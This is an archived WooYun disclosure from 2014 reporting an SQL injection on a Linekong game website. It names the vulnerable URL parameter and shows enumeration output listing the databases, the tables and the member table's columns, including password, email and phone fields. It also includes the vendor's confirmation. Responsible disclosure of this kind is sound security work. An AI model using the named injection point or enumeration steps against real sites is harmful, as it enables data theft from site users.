当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-052578

漏洞标题:蓝港在线分站有注入!(热血西游官方网站)

相关厂商:linekong.com

漏洞作者: →Hack涛

提交时间:2014-03-04 12:43

修复时间:2014-04-18 12:44

公开时间:2014-04-18 12:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-04: 细节已通知厂商并且等待厂商处理中
2014-03-04: 厂商已经确认,细节仅向厂商公开
2014-03-14: 细节向核心白帽子及相关领域专家公开
2014-03-24: 细节向普通白帽子公开
2014-04-03: 细节向实习白帽子公开
2014-04-18: 细节向公众公开

简要描述:

如题

详细说明:

注入点: http://rx.8864.com/imagelist.php?sort_id=87
数据库:
available databases [2]:
[*] information_schema
[*] rxxy_web

漏洞证明:

数据库:
available databases [2]:
[*] information_schema
[*] rxxy_web
[*] rxxy_web的表段:
+------------------------------+
| rxxy_activity_firstjh_cdkey |
| rxxy_activity_firstjh_log |
| rxxy_activity_firstjh_lunpan |
| rxxy_activity_firstjh_vote |
| rxxy_address |
| rxxy_article |
| rxxy_article_inserl |
| rxxy_build |
| rxxy_channel |
| rxxy_columns |
| rxxy_comment |
| rxxy_download |
| rxxy_editors_inserl |
| rxxy_flash |
| rxxy_grading |
| rxxy_group |
| rxxy_image |
| rxxy_image_inserl |
| rxxy_member |
| rxxy_passportstat |
| rxxy_sort |
| rxxy_template |
| rxxy_url |
| rxxy_url_inserl |
| rxxy_vote |
| rxxy_vote_inserl |
| rxxy_vote_option |
| rxxy_wj_article |
| rxxy_wj_article_inserl |
| rxxy_wj_image |
| rxxy_wj_image_inserl |
+------------------------------+
Table: rxxy_member
[26 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| address_id | int(11) |
| article_id | int(11) |
| group_id | int(11) |
| id | int(11) |
| image_id | int(11) |
| nickname | varchar(64) |
| uadd_time | datetime |
| url_id | int(11) |
| user_age | date |
| user_Dreply | int(11) |
| user_Dtopic | int(11) |
| user_email | varchar(32) |
| user_grading | varchar(64) |
| user_jointime | datetime |
| user_like | varchar(255) |
| user_movephone | varchar(32) |
| user_msn | varchar(128) |
| user_name | varchar(32) |
| user_passwd | varchar(32) |
| user_perfect | int(11) |
| user_qq | int(11) |
| user_sex | int(2) |
| user_state | int(2) |
| user_Treply | int(11) |
| user_Ttopic | int(11) |
| vote_id | int(11) |
+----------------+--------------+

2.jpg


修复方案:

防注入!过滤!感觉密码好弱!有的是简写!要加强密码!没有脱裤哦!

版权声明:转载请注明来源 →Hack涛@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-03-04 19:25

厂商回复:

非常感谢,马上会安排人修复。

最新状态:

暂无